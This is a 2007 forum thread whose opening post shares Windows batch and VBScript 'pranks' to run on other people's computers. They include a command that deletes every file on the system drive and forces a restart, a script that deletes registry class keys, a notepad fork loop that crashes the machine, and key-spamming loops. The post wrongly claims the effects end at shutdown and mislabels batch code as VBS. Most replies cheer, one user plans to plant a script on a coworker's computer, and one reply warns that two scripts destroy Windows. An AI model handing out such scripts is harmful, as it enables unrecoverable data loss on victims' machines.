Welcome Guest ( Log In | Register)



2 Pages V   1 2 >  
Reply to this topicStart new topic
> Nasty Windows Tricks Using Vbs Codes, blue screen of Death, Instant Shutdown, Endless Notepads
GaMeRrEmAg
post Dec 8 2007, 11:46 PM
Post #1


Newbie [Level 2]
**

Group: Members
Posts: 30
Joined: 8-December 07
Member No.: 54,446



The CMD Codes- to use, open up notepad and copy and paste the code into the notepad. name the file (anyname).vbs (to make a .vbs file, when u save it or save as, it will ask u for a name and which type u want it, so choose all file then just name it as a .vbs file) then just click on the file u just made

*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer

-The blue screen of Death [this might be dangerous]
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again

CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00




-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer

CODE
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10


-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)

CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE


-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*


CODE
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


-Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*

CODE
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


-Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*

CODE
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


-Endless Backspace
*This makes it so the backspace key is constantly being pressed*

CODE
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


-Popping CD Drives
*This will make the CD drives constantly pop out*

CODE
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop


This post has been edited by OpaQue: Dec 10 2007, 07:10 AM
Go to the top of the page
 
+Quote Post
elaks
post Dec 9 2007, 12:21 PM
Post #2


Advanced Member
*******

Group: Members
Posts: 114
Joined: 14-July 07
From: England
Member No.: 46,489



Unless this is copied from another source you've managed to categorize things quite nicely. Again- I'd put a really big warning about the Registry Key deleting one; something with big red text.. I've never heard of some of these before. The reoccuring backspace sounds like fun, and the forced blue screen could freak an experienced computer user out. I will most certainly bookmark this topic for future reference. It's a shame so many of my friends use Macs. biggrin.gif

Also, this is the wrong section.
Go to the top of the page
 
+Quote Post
thejestergl
post Dec 9 2007, 05:50 PM
Post #3


Super Member
*********

Group: Members
Posts: 230
Joined: 21-August 06
Member No.: 28,673



I have to admit that this is a pretty nifty thing to have, and good to know that it goes away when they shut off their computer (so you aren't a COMPLETE jerk). Some of the things you posted are more annoyances which is better then just messing up their computer completely. I think there should be a limit for how far you can go, and I think this one just hits the line so it didn't go too far.

Personally I like the one that will constantly open the CD drive because I know that can get really annoying haha. Then again having the backspace key constantly pressed down could be rather bad. I know that I would just die if I had a whole essay typed up and then re-opening it and find that my work got backspaced out xD! Though I know you can just not save it, it is still funny.

I think that what you have written is actually not really for someone you hate or seek revenge for, but rather a good prank. At least for most of the code it is! If it does no permanent damage I don't see how this can be all in good fun, especially since most of these again aren't really bad for the computer, but rather annoying to the user. I think I might use some of these for an april fools joke hehe. Thanks a million! <3

-Jester
Go to the top of the page
 
+Quote Post
cangor
post Dec 10 2007, 01:45 AM
Post #4


Super Member
*********

Group: [HOSTED]
Posts: 494
Joined: 19-June 06
From: The Basement
Member No.: 25,379



Man, that's completely diabolical. Like thejestergl says though, it's not really for someone you hate. If you hate someone then you tell them that, and tell them that they're a jerk, and they're not worth the dirt on your shoes or whatever, but revenge is never a good idea. These would definately make for a good prank on a friend though. I like the one about the constantly popping CD drives. happy.gif
Go to the top of the page
 
+Quote Post
Saint_Michael
post Dec 10 2007, 02:49 AM
Post #5


$p4m 0n j00 $h4m3 m3 0nc3 $p4m 0n m3 $h4m3 m3 7\/\/1c3
*********************

Group: [HOSTED]
Posts: 6,798
Joined: 21-September 04
From: 9r33|\| 399$ 4|\|D 5P4/\/\
Member No.: 1,218
T17 GFX Crew
myCENT:READY[102.80]



Some of them are interesting and I have a funny feeling those could be used in payloads for viruses, worms, trojans etc etc. Although these would be good to play on you friends, well not the file deleting, OS re-installation; but the CD ROM drive and the keyboard tricks would be funny because then they will start yelling at the computer companies on the phone about their computer's screwing up laugh.gif.
Go to the top of the page
 
+Quote Post
FLaKes
post Dec 10 2007, 08:13 AM
Post #6


Trap Grand Marshal Member
***********

Group: [HOSTED]
Posts: 1,140
Joined: 19-May 05
From: Mexico
Member No.: 7,234



Cool, I am going to try the one with the popping cd tray right now on my co workers computer, I just need the network name so I can leave him this little present. LOL.... hehe xd.gif
Go to the top of the page
 
+Quote Post
Galahad
post Dec 10 2007, 09:37 AM
Post #7


Neurotical Squirrel
*********

Group: [HOSTED]
Posts: 590
Joined: 4-November 04
From: Novi Sad, Vojvodina
Member No.: 2,127



First off, these 4 are not related to VBS, or VBScript, in any way... Code this user posted in the following 4 "pranks" is actually a command intrepreter code, that is written in old fashioned batch files, or .BAT files... These were used in DOS days, to speed up certain tasks that repeated often, a sort of equivalent of the maros...

QUOTE(GaMeRrEmAg @ Dec 9 2007, 12:46 AM) *
*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer.

This one is a lie, except in case of BAT-1 code, that I will elaborate on later in this post...

I believe this user has posted truely malicious code here, and that these dangerous ones should be removed, and the true prank ones left here...

BAT-1
QUOTE(GaMeRrEmAg @ Dec 9 2007, 12:46 AM) *
CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

This one will actually mess Windows up! It will delete ALL the files from your system hard drive, or system partition!

Command DEL is used (naturally) to delete files, %systemdrive% tells this command to wipe out everything from the partition you have your windows installed to (for example, C:), \*.* tells it to wipe every file it finds, and the switches /F /S /Q tell the command to force the deletion of read-only files, to wipe out every sub-directory, and to be quiet about it, respectively... This part is not at all a prank, and I don't recommend anyone trying this one... Ever...

BAT-2
QUOTE(GaMeRrEmAg @ Dec 9 2007, 12:46 AM) *
-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer

CODE
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10


Ok, this one really does send the message, but it sends this message to everyone on the network... MSG command is used to send short text messages between two or more computers on the network, mainly local network... MSG * will send the message to all the computers in the network... Not really funny, but hey... It's at least not malicious...

BAT-3
QUOTE(GaMeRrEmAg @ Dec 9 2007, 12:46 AM) *
-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)

CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE

This one is just as bad, as the first one... It wipes out entire HKEY_CLASSES_ROOT registry section, and effectively kills your Windows... And again, it's a command-prompt style batch file... But, none the less, it's very malicious, and should NOT be tried...

BAT-4
QUOTE(GaMeRrEmAg @ Dec 9 2007, 12:46 AM) *
-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
CODE
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


This one is not malicous, as it will only start notepads, until you run out of memory... Then windows will crash... Can be tried on someone I guess...

It appears to me, that this user has copied this code from some site, and has no real coding experience, and is, what would be called a wannabe-hacker... Probably some kid, with too much time on his hands... I would STRONGLY recommend that you avoid using BAT-1 and BAT-3 codes, as they WILL kill your computer, and you won't be able to revive your system without reinstallation... BAT-1 will destroy ANY file found on your system hard drive, and probably all files in your My Documents folder, as this folder is also stored on your system hard drive or partition...

I would urge the moderators to remove BAT-1 and BAT-3 codes, as they pose a big risk for users that do not know what they do... And I would recommend warning this user about posting such content... This could be very harmfull to this community...
Go to the top of the page
 
+Quote Post
rayzoredge
post Dec 10 2007, 04:28 PM
Post #8


Privileged Member
*********

Group: Members
Posts: 537
Joined: 26-January 06
From: New Durham, NH
Member No.: 17,651
myCENT:64.22



QUOTE(Galahad @ Dec 10 2007, 04:37 AM) *


Thanks for clarifying that. When OP mentioned them as VBS scripts, I was wondering why VBS looked so much like command-line batch files...

I thought netsend was to send messages over the network...